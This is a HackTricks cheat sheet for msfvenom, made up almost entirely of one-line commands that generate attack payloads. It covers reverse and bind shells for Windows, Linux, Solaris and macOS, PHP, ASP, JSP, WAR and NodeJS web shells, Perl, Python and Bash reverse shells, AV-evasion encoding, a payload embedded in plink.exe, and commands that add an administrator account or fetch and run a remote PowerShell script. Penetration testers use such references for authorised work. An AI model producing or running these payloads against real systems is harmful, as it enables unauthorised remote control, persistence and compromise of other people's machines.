hacktricks/generic-methodologies-and-resources/shells/msfvenom.md
Carlos Polop 191e37fa59 arte
2023-12-30 21:49:23 +01:00

7.9 KiB

MSFVenom - CheatSheet

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!


Basic msfvenom

msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>

One can also use the -a to specify the architecture or the --platform

Listing

msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders

Common params when creating a shellcode

-b "\x00\x0a\x0d" 
-f c 
-e x86/shikata_ga_nai -i 5 
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID

Windows

Reverse Shell

{% code overflow="wrap" %}

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

{% endcode %}

Bind Shell

{% code overflow="wrap" %}

msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe

{% endcode %}

Create User

{% code overflow="wrap" %}

msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe

{% endcode %}

CMD Shell

{% code overflow="wrap" %}

msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe

{% endcode %}

Execute Command

{% code overflow="wrap" %}

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe

{% endcode %}

Encoder

{% code overflow="wrap" %}

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe

{% endcode %}

Embedded inside executable

{% code overflow="wrap" %}

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe

{% endcode %}

Linux Payloads

Reverse Shell

{% code overflow="wrap" %}

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

{% endcode %}

Bind Shell

{% code overflow="wrap" %}

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf

{% endcode %}

SunOS (Solaris)

{% code overflow="wrap" %}

msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf

{% endcode %}

MAC Payloads

Reverse Shell:

{% code overflow="wrap" %}

msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho

{% endcode %}

Bind Shell

{% code overflow="wrap" %}

msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho

{% endcode %}

Web Based Payloads

PHP

Reverse shell

{% code overflow="wrap" %}

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

{% endcode %}

ASP/x

Reverse shell

{% code overflow="wrap" %}

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx

{% endcode %}

JSP

Reverse shell

{% code overflow="wrap" %}

msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp

{% endcode %}

WAR

Reverse Shell

{% code overflow="wrap" %}

msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war

{% endcode %}

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)

Script Language payloads

Perl

{% code overflow="wrap" %}

msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl

{% endcode %}

Python

{% code overflow="wrap" %}

msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py

{% endcode %}

Bash

{% code overflow="wrap" %}

msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh

{% endcode %}

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: